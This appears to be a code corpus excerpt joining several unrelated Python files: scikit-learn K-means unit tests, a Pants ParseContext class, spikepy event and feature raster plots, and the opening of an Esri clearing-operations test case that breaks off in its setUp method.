"""Testing for K-means""" import sys import numpy as np from scipy import sparse as sp from sklearn.utils.testing import assert_equal from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import SkipTest from sklearn.utils.testing import assert_almost_equal from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_raises_regexp from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_greater from sklearn.utils.testing import assert_less from sklearn.utils.testing import assert_warns from sklearn.utils.testing import if_not_mac_os from sklearn.utils.validation import DataConversionWarning from sklearn.utils.extmath import row_norms from sklearn.metrics.cluster import v_measure_score from sklearn.cluster import KMeans, k_means from sklearn.cluster import MiniBatchKMeans from sklearn.cluster.k_means_ import _labels_inertia from sklearn.cluster.k_means_ import _mini_batch_step from sklearn.datasets.samples_generator import make_blobs from sklearn.externals.six.moves import cStringIO as StringIO # non centered, sparse centers to check the centers = np.array([ [0.0, 5.0, 0.0, 0.0, 0.0], [1.0, 1.0, 4.0, 0.0, 0.0], [1.0, 0.0, 0.0, 5.0, 1.0], ]) n_samples = 100 n_clusters, n_features = centers.shape X, true_labels = make_blobs(n_samples=n_samples, centers=centers, cluster_std=1., random_state=42) X_csr = sp.csr_matrix(X) def test_kmeans_dtype(): rnd = np.random.RandomState(0) X = rnd.normal(size=(40, 2)) X = (X * 10).astype(np.uint8) km = KMeans(n_init=1).fit(X) pred_x = assert_warns(DataConversionWarning, km.predict, X) assert_array_equal(km.labels_, pred_x) def test_labels_assignment_and_inertia(): # pure numpy implementation as easily auditable reference gold # implementation rng = np.random.RandomState(42) noisy_centers = centers + rng.normal(size=centers.shape) labels_gold = - np.ones(n_samples, dtype=np.int) mindist = 
np.empty(n_samples) mindist.fill(np.infty) for center_id in range(n_clusters): dist = np.sum((X - noisy_centers[center_id]) ** 2, axis=1) labels_gold[dist < mindist] = center_id mindist = np.minimum(dist, mindist) inertia_gold = mindist.sum() assert_true((mindist >= 0.0).all()) assert_true((labels_gold != -1).all()) # perform label assignment using the dense array input x_squared_norms = (X ** 2).sum(axis=1) labels_array, inertia_array = _labels_inertia( X, x_squared_norms, noisy_centers) assert_array_almost_equal(inertia_array, inertia_gold) assert_array_equal(labels_array, labels_gold) # perform label assignment using the sparse CSR input x_squared_norms_from_csr = row_norms(X_csr, squared=True) labels_csr, inertia_csr = _labels_inertia( X_csr, x_squared_norms_from_csr, noisy_centers) assert_array_almost_equal(inertia_csr, inertia_gold) assert_array_equal(labels_csr, labels_gold) def test_minibatch_update_consistency(): # Check that dense and sparse minibatch update give the same results rng = np.random.RandomState(42) old_centers = centers + rng.normal(size=centers.shape) new_centers = old_centers.copy() new_centers_csr = old_centers.copy() counts = np.zeros(new_centers.shape[0], dtype=np.int32) counts_csr = np.zeros(new_centers.shape[0], dtype=np.int32) x_squared_norms = (X ** 2).sum(axis=1) x_squared_norms_csr = row_norms(X_csr, squared=True) buffer = np.zeros(centers.shape[1], dtype=np.double) buffer_csr = np.zeros(centers.shape[1], dtype=np.double) # extract a small minibatch X_mb = X[:10] X_mb_csr = X_csr[:10] x_mb_squared_norms = x_squared_norms[:10] x_mb_squared_norms_csr = x_squared_norms_csr[:10] # step 1: compute the dense minibatch update old_inertia, incremental_diff = _mini_batch_step( X_mb, x_mb_squared_norms, new_centers, counts, buffer, 1, None, random_reassign=False) assert_greater(old_inertia, 0.0) # compute the new inertia on the same batch to check that it decreased labels, new_inertia = _labels_inertia( X_mb, x_mb_squared_norms, new_centers) 
assert_greater(new_inertia, 0.0) assert_less(new_inertia, old_inertia) # check that the incremental difference computation is matching the # final observed value effective_diff = np.sum((new_centers - old_centers) ** 2) assert_almost_equal(incremental_diff, effective_diff) # step 2: compute the sparse minibatch update old_inertia_csr, incremental_diff_csr = _mini_batch_step( X_mb_csr, x_mb_squared_norms_csr, new_centers_csr, counts_csr, buffer_csr, 1, None, random_reassign=False) assert_greater(old_inertia_csr, 0.0) # compute the new inertia on the same batch to check that it decreased labels_csr, new_inertia_csr = _labels_inertia( X_mb_csr, x_mb_squared_norms_csr, new_centers_csr) assert_greater(new_inertia_csr, 0.0) assert_less(new_inertia_csr, old_inertia_csr) # check that the incremental difference computation is matching the # final observed value effective_diff = np.sum((new_centers_csr - old_centers) ** 2) assert_almost_equal(incremental_diff_csr, effective_diff) # step 3: check that sparse and dense updates lead to the same results assert_array_equal(labels, labels_csr) assert_array_almost_equal(new_centers, new_centers_csr) assert_almost_equal(incremental_diff, incremental_diff_csr) assert_almost_equal(old_inertia, old_inertia_csr) assert_almost_equal(new_inertia, new_inertia_csr) def _check_fitted_model(km): # check that the number of clusters centers and distinct labels match # the expectation centers = km.cluster_centers_ assert_equal(centers.shape, (n_clusters, n_features)) labels = km.labels_ assert_equal(np.unique(labels).shape[0], n_clusters) # check that the labels assignment are perfect (up to a permutation) assert_equal(v_measure_score(true_labels, labels), 1.0) assert_greater(km.inertia_, 0.0) # check error on dataset being too small assert_raises(ValueError, km.fit, [[0., 1.]]) def test_k_means_plus_plus_init(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42).fit(X) _check_fitted_model(km) def test_k_means_new_centers(): # 
Explore the part of the code where a new center is reassigned X = np.array([[0, 0, 1, 1], [0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 0, 0]]) labels = [0, 1, 2, 1, 1, 2] bad_centers = np.array([[+0, 1, 0, 0], [.2, 0, .2, .2], [+0, 0, 0, 0]]) km = KMeans(n_clusters=3, init=bad_centers, n_init=1, max_iter=10, random_state=1) for this_X in (X, sp.coo_matrix(X)): km.fit(this_X) this_labels = km.labels_ # Reorder the labels so that the first instance is in cluster 0, # the second in cluster 1, ... this_labels = np.unique(this_labels, return_index=True)[1][this_labels] np.testing.assert_array_equal(this_labels, labels) def _has_blas_lib(libname): from numpy.distutils.system_info import get_info return libname in get_info('blas_opt').get('libraries', []) @if_not_mac_os() def test_k_means_plus_plus_init_2_jobs(): if _has_blas_lib('openblas'): raise SkipTest('Multi-process bug with OpenBLAS (see issue #636)') km = KMeans(init="k-means++", n_clusters=n_clusters, n_jobs=2, random_state=42).fit(X) _check_fitted_model(km) def test_k_means_precompute_distances_flag(): # check that a warning is raised if the precompute_distances flag is not # supported km = KMeans(precompute_distances="wrong") assert_raises(ValueError, km.fit, X) def test_k_means_plus_plus_init_sparse(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42) km.fit(X_csr) _check_fitted_model(km) def test_k_means_random_init(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42) km.fit(X) _check_fitted_model(km) def test_k_means_random_init_sparse(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42) km.fit(X_csr) _check_fitted_model(km) def test_k_means_plus_plus_init_not_precomputed(): km = KMeans(init="k-means++", n_clusters=n_clusters, random_state=42, precompute_distances=False).fit(X) _check_fitted_model(km) def test_k_means_random_init_not_precomputed(): km = KMeans(init="random", n_clusters=n_clusters, random_state=42, 
precompute_distances=False).fit(X) _check_fitted_model(km) def test_k_means_perfect_init(): km = KMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1) km.fit(X) _check_fitted_model(km) def test_k_means_n_init(): rnd = np.random.RandomState(0) X = rnd.normal(size=(40, 2)) # two regression tests on bad n_init argument # previous bug: n_init <= 0 threw non-informative TypeError (#3858) assert_raises_regexp(ValueError, "n_init", KMeans(n_init=0).fit, X) assert_raises_regexp(ValueError, "n_init", KMeans(n_init=-1).fit, X) def test_k_means_fortran_aligned_data(): # Check the KMeans will work well, even if X is a fortran-aligned data. X = np.asfortranarray([[0, 0], [0, 1], [0, 1]]) centers = np.array([[0, 0], [0, 1]]) labels = np.array([0, 1, 1]) km = KMeans(n_init=1, init=centers, precompute_distances=False, random_state=42) km.fit(X) assert_array_equal(km.cluster_centers_, centers) assert_array_equal(km.labels_, labels) def test_mb_k_means_plus_plus_init_dense_array(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42) mb_k_means.fit(X) _check_fitted_model(mb_k_means) def test_mb_kmeans_verbose(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42, verbose=1) old_stdout = sys.stdout sys.stdout = StringIO() try: mb_k_means.fit(X) finally: sys.stdout = old_stdout def test_mb_k_means_plus_plus_init_sparse_matrix(): mb_k_means = MiniBatchKMeans(init="k-means++", n_clusters=n_clusters, random_state=42) mb_k_means.fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_init_with_large_k(): mb_k_means = MiniBatchKMeans(init='k-means++', init_size=10, n_clusters=20) # Check that a warning is raised, as the number clusters is larger # than the init_size assert_warns(RuntimeWarning, mb_k_means.fit, X) def test_minibatch_k_means_random_init_dense_array(): # increase n_init to make random init stable enough mb_k_means = MiniBatchKMeans(init="random", n_clusters=n_clusters, 
random_state=42, n_init=10).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_k_means_random_init_sparse_csr(): # increase n_init to make random init stable enough mb_k_means = MiniBatchKMeans(init="random", n_clusters=n_clusters, random_state=42, n_init=10).fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_k_means_perfect_init_dense_array(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_k_means_init_multiple_runs_with_explicit_centers(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=10) assert_warns(RuntimeWarning, mb_k_means.fit, X) def test_minibatch_k_means_perfect_init_sparse_csr(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, random_state=42, n_init=1).fit(X_csr) _check_fitted_model(mb_k_means) def test_minibatch_sensible_reassign_fit(): # check if identical initial clusters are reassigned # also a regression test for when there are more desired reassignments than # samples. 
zeroed_X, true_labels = make_blobs(n_samples=100, centers=5, cluster_std=1., random_state=42) zeroed_X[::2, :] = 0 mb_k_means = MiniBatchKMeans(n_clusters=20, batch_size=10, random_state=42, init="random") mb_k_means.fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) # do the same with batch-size > X.shape[0] (regression test) mb_k_means = MiniBatchKMeans(n_clusters=20, batch_size=201, random_state=42, init="random") mb_k_means.fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) def test_minibatch_sensible_reassign_partial_fit(): zeroed_X, true_labels = make_blobs(n_samples=n_samples, centers=5, cluster_std=1., random_state=42) zeroed_X[::2, :] = 0 mb_k_means = MiniBatchKMeans(n_clusters=20, random_state=42, init="random") for i in range(100): mb_k_means.partial_fit(zeroed_X) # there should not be too many exact zero cluster centers assert_greater(mb_k_means.cluster_centers_.any(axis=1).sum(), 10) def test_minibatch_reassign(): # Give a perfect initialization, but a large reassignment_ratio, # as a result all the centers should be reassigned and the model # should not longer be good for this_X in (X, X_csr): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, random_state=42) mb_k_means.fit(this_X) score_before = mb_k_means.score(this_X) try: old_stdout = sys.stdout sys.stdout = StringIO() # Turn on verbosity to smoke test the display code _mini_batch_step(this_X, (X ** 2).sum(axis=1), mb_k_means.cluster_centers_, mb_k_means.counts_, np.zeros(X.shape[1], np.double), False, distances=np.zeros(X.shape[0]), random_reassign=True, random_state=42, reassignment_ratio=1, verbose=True) finally: sys.stdout = old_stdout assert_greater(score_before, mb_k_means.score(this_X)) # Give a perfect initialization, with a small reassignment_ratio, # no center should be reassigned for this_X in (X, 
X_csr): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, init=centers.copy(), random_state=42, n_init=1) mb_k_means.fit(this_X) clusters_before = mb_k_means.cluster_centers_ # Turn on verbosity to smoke test the display code _mini_batch_step(this_X, (X ** 2).sum(axis=1), mb_k_means.cluster_centers_, mb_k_means.counts_, np.zeros(X.shape[1], np.double), False, distances=np.zeros(X.shape[0]), random_reassign=True, random_state=42, reassignment_ratio=1e-15) assert_array_almost_equal(clusters_before, mb_k_means.cluster_centers_) def test_minibatch_with_many_reassignments(): # Test for the case that the number of clusters to reassign is bigger # than the batch_size n_samples = 550 rnd = np.random.RandomState(42) X = rnd.uniform(size=(n_samples, 10)) # Check that the fit works if n_clusters is bigger than the batch_size. # Run the test with 550 clusters and 550 samples, because it turned out # that this values ensure that the number of clusters to reassign # is always bigger than the batch_size n_clusters = 550 MiniBatchKMeans(n_clusters=n_clusters, batch_size=100, init_size=n_samples, random_state=42).fit(X) def test_sparse_mb_k_means_callable_init(): def test_init(X, k, random_state): return centers # Small test to check that giving the wrong number of centers # raises a meaningful error assert_raises(ValueError, MiniBatchKMeans(init=test_init, random_state=42).fit, X_csr) # Now check that the fit actually works mb_k_means = MiniBatchKMeans(n_clusters=3, init=test_init, random_state=42).fit(X_csr) _check_fitted_model(mb_k_means) def test_mini_batch_k_means_random_init_partial_fit(): km = MiniBatchKMeans(n_clusters=n_clusters, init="random", random_state=42) # use the partial_fit API for online learning for X_minibatch in np.array_split(X, 10): km.partial_fit(X_minibatch) # compute the labeling on the complete dataset labels = km.predict(X) assert_equal(v_measure_score(true_labels, labels), 1.0) def test_minibatch_default_init_size(): mb_k_means = 
MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, batch_size=10, random_state=42, n_init=1).fit(X) assert_equal(mb_k_means.init_size_, 3 * mb_k_means.batch_size) _check_fitted_model(mb_k_means) def test_minibatch_tol(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, batch_size=10, random_state=42, tol=.01).fit(X) _check_fitted_model(mb_k_means) def test_minibatch_set_init_size(): mb_k_means = MiniBatchKMeans(init=centers.copy(), n_clusters=n_clusters, init_size=666, random_state=42, n_init=1).fit(X) assert_equal(mb_k_means.init_size, 666) assert_equal(mb_k_means.init_size_, n_samples) _check_fitted_model(mb_k_means) def test_k_means_invalid_init(): km = KMeans(init="invalid", n_init=1, n_clusters=n_clusters) assert_raises(ValueError, km.fit, X) def test_mini_match_k_means_invalid_init(): km = MiniBatchKMeans(init="invalid", n_init=1, n_clusters=n_clusters) assert_raises(ValueError, km.fit, X) def test_k_means_copyx(): # Check if copy_x=False returns nearly equal X after de-centering. my_X = X.copy() km = KMeans(copy_x=False, n_clusters=n_clusters, random_state=42) km.fit(my_X) _check_fitted_model(km) # check if my_X is centered assert_array_almost_equal(my_X, X) def test_k_means_non_collapsed(): # Check k_means with a bad initialization does not yield a singleton # Starting with bad centers that are quickly ignored should not # result in a repositioning of the centers to the center of mass that # would lead to collapsed centers which in turns make the clustering # dependent of the numerical unstabilities. 
my_X = np.array([[1.1, 1.1], [0.9, 1.1], [1.1, 0.9], [0.9, 1.1]]) array_init = np.array([[1.0, 1.0], [5.0, 5.0], [-5.0, -5.0]]) km = KMeans(init=array_init, n_clusters=3, random_state=42, n_init=1) km.fit(my_X) # centers must not been collapsed assert_equal(len(np.unique(km.labels_)), 3) centers = km.cluster_centers_ assert_true(np.linalg.norm(centers[0] - centers[1]) >= 0.1) assert_true(np.linalg.norm(centers[0] - centers[2]) >= 0.1) assert_true(np.linalg.norm(centers[1] - centers[2]) >= 0.1) def test_predict(): km = KMeans(n_clusters=n_clusters, random_state=42) km.fit(X) # sanity check: predict centroid labels pred = km.predict(km.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # sanity check: re-predict labeling for training set samples pred = km.predict(X) assert_array_equal(pred, km.labels_) # re-predict labels for training set using fit_predict pred = km.fit_predict(X) assert_array_equal(pred, km.labels_) def test_score(): km1 = KMeans(n_clusters=n_clusters, max_iter=1, random_state=42) s1 = km1.fit(X).score(X) km2 = KMeans(n_clusters=n_clusters, max_iter=10, random_state=42) s2 = km2.fit(X).score(X) assert_greater(s2, s1) def test_predict_minibatch_dense_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, random_state=40).fit(X) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # sanity check: re-predict labeling for training set samples pred = mb_k_means.predict(X) assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_predict_minibatch_kmeanspp_init_sparse_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, init='k-means++', n_init=10).fit(X_csr) # sanity check: re-predict labeling for training set samples assert_array_equal(mb_k_means.predict(X_csr), mb_k_means.labels_) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # 
check that models trained on sparse input also works for dense input at # predict time assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_predict_minibatch_random_init_sparse_input(): mb_k_means = MiniBatchKMeans(n_clusters=n_clusters, init='random', n_init=10).fit(X_csr) # sanity check: re-predict labeling for training set samples assert_array_equal(mb_k_means.predict(X_csr), mb_k_means.labels_) # sanity check: predict centroid labels pred = mb_k_means.predict(mb_k_means.cluster_centers_) assert_array_equal(pred, np.arange(n_clusters)) # check that models trained on sparse input also works for dense input at # predict time assert_array_equal(mb_k_means.predict(X), mb_k_means.labels_) def test_input_dtypes(): X_list = [[0, 0], [10, 10], [12, 9], [-1, 1], [2, 0], [8, 10]] X_int = np.array(X_list, dtype=np.int32) X_int_csr = sp.csr_matrix(X_int) init_int = X_int[:2] fitted_models = [ KMeans(n_clusters=2).fit(X_list), KMeans(n_clusters=2).fit(X_int), KMeans(n_clusters=2, init=init_int, n_init=1).fit(X_list), KMeans(n_clusters=2, init=init_int, n_init=1).fit(X_int), # mini batch kmeans is very unstable on such a small dataset hence # we use many inits MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_list), MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_int), MiniBatchKMeans(n_clusters=2, n_init=10, batch_size=2).fit(X_int_csr), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_list), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_int), MiniBatchKMeans(n_clusters=2, batch_size=2, init=init_int, n_init=1).fit(X_int_csr), ] expected_labels = [0, 1, 1, 0, 0, 1] scores = np.array([v_measure_score(expected_labels, km.labels_) for km in fitted_models]) assert_array_equal(scores, np.ones(scores.shape[0])) def test_transform(): km = KMeans(n_clusters=n_clusters) km.fit(X) X_new = km.transform(km.cluster_centers_) for c in range(n_clusters): assert_equal(X_new[c, c], 0) for c2 in 
range(n_clusters): if c != c2: assert_greater(X_new[c, c2], 0) def test_fit_transform(): X1 = KMeans(n_clusters=3, random_state=51).fit(X).transform(X) X2 = KMeans(n_clusters=3, random_state=51).fit_transform(X) assert_array_equal(X1, X2) def test_n_init(): # Check that increasing the number of init increases the quality n_runs = 5 n_init_range = [1, 5, 10] inertia = np.zeros((len(n_init_range), n_runs)) for i, n_init in enumerate(n_init_range): for j in range(n_runs): km = KMeans(n_clusters=n_clusters, init="random", n_init=n_init, random_state=j).fit(X) inertia[i, j] = km.inertia_ inertia = inertia.mean(axis=1) failure_msg = ("Inertia %r should be decreasing" " when n_init is increasing.") % list(inertia) for i in range(len(n_init_range) - 1): assert_true(inertia[i] >= inertia[i + 1], failure_msg) def test_k_means_function(): # test calling the k_means function directly # catch output old_stdout = sys.stdout sys.stdout = StringIO() try: cluster_centers, labels, inertia = k_means(X, n_clusters=n_clusters, verbose=True) finally: sys.stdout = old_stdout centers = cluster_centers assert_equal(centers.shape, (n_clusters, n_features)) labels = labels assert_equal(np.unique(labels).shape[0], n_clusters) # check that the labels assignment are perfect (up to a permutation) assert_equal(v_measure_score(true_labels, labels), 1.0) assert_greater(inertia, 0.0) # check warning when centers are passed assert_warns(RuntimeWarning, k_means, X, n_clusters=n_clusters, init=centers) # to many clusters desired assert_raises(ValueError, k_means, X, n_clusters=X.shape[0] + 1)
jtrobec/pants
refs/heads/master
src/python/pants/base/parse_context.py
20
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

from __future__ import (absolute_import, division, generators, nested_scopes,
                        print_function, unicode_literals, with_statement)


class ParseContext(object):
  """The build file context that context aware objects - aka BUILD macros - operate against."""

  def __init__(self, rel_path, type_aliases):
    """Captures the BUILD file location and the alias -> type mapping it can construct from.

    :param rel_path: Path of the BUILD file relative to the build root.
    :param type_aliases: Mapping from alias (or type) to the registered constructor.
    """
    self._rel_path = rel_path
    self._type_aliases = type_aliases

  def create_object(self, alias, *args, **kwargs):
    """Constructs the type with the given alias using the given args and kwargs.

    NB: aliases may be the alias' object type itself if that type is known.

    :param alias: Either the type alias or the type itself.
    :type alias: string|type
    :param *args: These pass through to the underlying callable object.
    :param **kwargs: These pass through to the underlying callable object.
    :returns: The created object.
    :raises KeyError: If no type is registered for ``alias``.
    """
    constructor = self._type_aliases.get(alias)
    if constructor is None:
      raise KeyError('There is no type registered for alias {0}'.format(alias))
    return constructor(*args, **kwargs)

  @property
  def rel_path(self):
    """Relative path from the build root to the BUILD file the context aware object is called in.

    :rtype string
    """
    return self._rel_path
davidlmorton/spikepy
refs/heads/master
spikepy/builtins/visualizations/rasters.py
1
#  Copyright (C) 2012  David Morton
#
#  This program is free software: you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation, either version 3 of the License, or
#  (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program.  If not, see <http://www.gnu.org/licenses/>.
import numpy

from spikepy.developer.visualization import Visualization
from spikepy.plotting_utils.general import create_times_array, as_fraction
# NOTE(review): update_scalebars is imported but not referenced in this
# module as visible here.
from spikepy.plotting_utils.make_into_publication_axes import \
        make_into_publication_axes, update_scalebars
from spikepy.common.valid_types import ValidFloat, ValidBoolean, ValidOption,\
        ValidInteger

# Color palettes keyed by the invert_colors flag (True -> dark background).
background = {True: 'black', False: 'white'}
foreground = {True: 'white', False: 'black'}
colors = {True: ['cyan', 'magenta', 'yellow'],
          False: ['red', 'green', 'blue']}


class EventRasterVisualization(Visualization):
    # Plots each detection-filtered channel as a vertically offset trace and
    # overlays tick marks ("rasters") at detected event times.
    name = 'Event Raster(s)'
    requires = ['df_traces', 'df_sampling_freq']
    found_under_tab = 'detection'

    # User-tunable plot parameters (validated by the spikepy Valid* types).
    channel_separation_std = ValidFloat(0.1, 100.0, default=8.0,
            description='How far apart the channels are plotted (as a multiple of the standard deviation of the signal).')
    invert_colors = ValidBoolean(default=False)
    raster_position = ValidOption('peak', 'center', default='center')
    raster_size = ValidInteger(1, 1000, default=20,
            description='Size of raster tick marks in pixels.')
    trace_opacity = ValidFloat(0.0, 1.0, default=0.25,
            description='How darkly the traces are plotted.')

    def _plot(self, trial, figure, channel_separation_std=8.0,
              invert_colors=False, raster_position='center', raster_size=20,
              trace_opacity=0.25):
        # Render all channels of trial.df_traces onto `figure`, one offset
        # trace per channel, with event tick marks when the trial has
        # event_times.  Stores the created axes on self.axes.
        f_traces = trial.df_traces.data
        f_sf = trial.df_sampling_freq.data
        f_times = create_times_array(f_traces, f_sf)
        if hasattr(trial, 'event_times'):
            event_times = trial.event_times.data
        else:
            event_times = None
        have_event_times = (event_times is not None)

        def as_frac(x=None, y=None):
            # Convert a pixel offset into a fraction of the current canvas.
            f = figure
            canvas_size_in_pixels = (f.get_figwidth()*f.get_dpi(),
                                     f.get_figheight()*f.get_dpi())
            return as_fraction(x=x, y=y,
                    canvas_size_in_pixels=canvas_size_in_pixels)

        figure.set_facecolor(background[invert_colors])
        figure.set_edgecolor(foreground[invert_colors])
        figure.subplots_adjust(left=as_frac(x=75), right=1.0-as_frac(x=10),
                               bottom=as_frac(y=30), top=1.0-as_frac(y=10))

        # Vertical gap between channels, scaled by the first channel's std.
        channel_separation = numpy.std(f_traces[0]) * channel_separation_std

        axes = figure.add_subplot(111)
        axes.set_axis_bgcolor(background[invert_colors])
        make_into_publication_axes(axes,
                base_unit_prefix=('', 'm'),
                scale_bar_origin_frac=as_frac(-25, -5),
                target_size_frac=as_frac(150, 80),
                y_label_rotation='vertical',
                color=foreground[invert_colors])
        axes.lock_axes()

        # plot traces
        offsets = []
        y_mins = []
        y_maxs = []
        for i, f_trace in enumerate(f_traces):
            offset = -i*channel_separation
            offsets.append(offset)
            y_values = f_trace+offset
            y_mins.append(numpy.min(y_values))
            y_maxs.append(numpy.max(y_values))
            axes.signal_plot(f_times, y_values,
                    color=foreground[invert_colors],
                    alpha=trace_opacity)

        axes.set_ylabel('Channel', color=foreground[invert_colors])
        axes.set_yticks(offsets)
        axes.set_yticklabels([str((i+1)) for i in range(len(offsets))],
                color=foreground[invert_colors])

        y_min = min(y_mins)
        y_max = max(y_maxs)
        y_range = y_max - y_min

        if have_event_times:
            # One raster row per channel; colors cycle through the palette.
            for i, event_sequence in enumerate(event_times):
                if len(event_sequence) > 0:
                    color = colors[invert_colors][
                            i % len(colors[invert_colors])]
                    e_xs = event_sequence
                    if raster_position == 'center':
                        # Ticks sit on the channel's baseline offset.
                        e_ys = [offsets[i] for e in e_xs]
                    else:
                        # 'peak': ticks sit on the trace value at the event.
                        # 0.1 corrects for roundoff error
                        event_indexes = [int(f_sf*e+0.1) for e in e_xs]
                        e_ys = [f_traces[i][ei]+offsets[i]
                                for ei in event_indexes]
                    axes.plot(numpy.array(e_xs), numpy.array(e_ys),
                            linewidth=0, marker='|',
                            markersize=raster_size,
                            color=color,
                            markeredgewidth=2)
        axes.unlock_axes()
        axes.set_xlim(f_times[0], f_times[-1])
        # Pad 3% below and 20% above to leave room for raster rows.
        axes.set_ylim((y_min - 0.03*y_range, y_max + 0.20*y_range))
        self.axes = axes


class FeatureRasterVisualization(EventRasterVisualization):
    # Extends the event raster with a single extra raster row marking the
    # times at which features were extracted.
    name = 'Feature Raster'
    requires = ['df_traces', 'df_sampling_freq', 'event_times']
    found_under_tab = 'extraction'

    channel_separation_std = ValidFloat(0.1, 100.0, default=8.0,
            description='How far apart the channels are plotted (as a multiple of the standard deviation of the signal).')
    invert_colors = ValidBoolean(default=False)
    event_raster_position = ValidOption('peak', 'center', default='center')
    # Parent attributes replaced by the event_*/feature_* variants above/below.
    raster_position = None
    event_raster_size = ValidInteger(1, 1000, default=20,
            description='Size of event raster tick marks in pixels.')
    raster_size = None
    feature_raster_position = ValidOption('top', 'middle', 'bottom',
            default='top')
    # NOTE(review): this declares default=20 but the _plot signature below
    # defaults feature_raster_size to 50 -- confirm which default is intended.
    feature_raster_size = ValidInteger(1, 1000, default=20,
            description='Size of feature raster tick marks in pixels.')
    trace_opacity = ValidFloat(0.0, 1.0, default=0.25,
            description='How darkly the traces are plotted.')

    def _plot(self, trial, figure, channel_separation_std=8.0,
              invert_colors=False, event_raster_position='center',
              event_raster_size=20, feature_raster_position='top',
              feature_raster_size=50, trace_opacity=0.25):
        # call parent's _plot first.
        EventRasterVisualization._plot(self, trial, figure,
                channel_separation_std=channel_separation_std,
                invert_colors=invert_colors,
                raster_size=event_raster_size,
                raster_position=event_raster_position,
                trace_opacity=trace_opacity)

        # if possible, plot feature raster.
        if (hasattr(trial, 'features') and
                trial.features.data is not None and
                hasattr(trial, 'feature_times') and
                trial.feature_times.data is not None):
            self.axes.lock_axes()
            ymin, ymax = self.axes.get_ylim()
            # Map the position option to a constant y for the raster row.
            positions = {'top': ymax, 'bottom': ymin,
                         'middle': (ymax+ymin)/2.0}
            ft = trial.feature_times.data
            self.axes.plot(ft,
                    numpy.ones(len(ft))*positions[feature_raster_position],
                    linewidth=0, marker='|',
                    markersize=feature_raster_size,
                    color=foreground[invert_colors],
                    markeredgewidth=2)
            self.axes.unlock_axes()
pshowalter/solutions-geoprocessing-toolbox
refs/heads/dev
utils/test/clearing_operations_tests/ClearingOperationsCanvasAreaGRGTestCase.py
1
#------------------------------------------------------------------------------
# Copyright 2017 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#------------------------------------------------------------------------------

import logging
import arcpy
from arcpy.sa import *
import sys
import traceback
import datetime
import os

# Add parent folder to python path if running test case standalone
# NOTE(review): 'import sys' appears twice in this module (also above);
# harmless but redundant.
import sys
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '..')))

import unittest
import Configuration
import UnitTestUtilities
import DataDownload

class ClearingOperationsCanvasAreaGRGTestCase(unittest.TestCase):
    # Integration test for the Clearing Operations "Canvas Area GRG" script
    # tool: downloads test data, runs the tool over the AO input area, and
    # checks the generated grid's feature count.

    toolboxUnderTest = None # Set to Pro or ArcMap toolbox at runtime

    inputArea = None
    output = None

    scratchGDB = None

    def setUp(self):
        # Resolve platform-specific toolbox path, fetch test data, and
        # create a scratch geodatabase for tool output.
        if Configuration.DEBUG == True: print(" ClearingOperationsCanvasAreaGRGTestCase.setUp")

        ''' Initialization needed if running Test Case standalone '''
        Configuration.GetLogger()
        Configuration.GetPlatform()
        ''' End standalone initialization '''

        self.toolboxUnderTest = Configuration.clearingOperationsToolboxPath + \
            Configuration.GetToolboxSuffix()

        UnitTestUtilities.checkArcPy()

        DataDownload.runDataDownload(Configuration.clearingOperationsPath, \
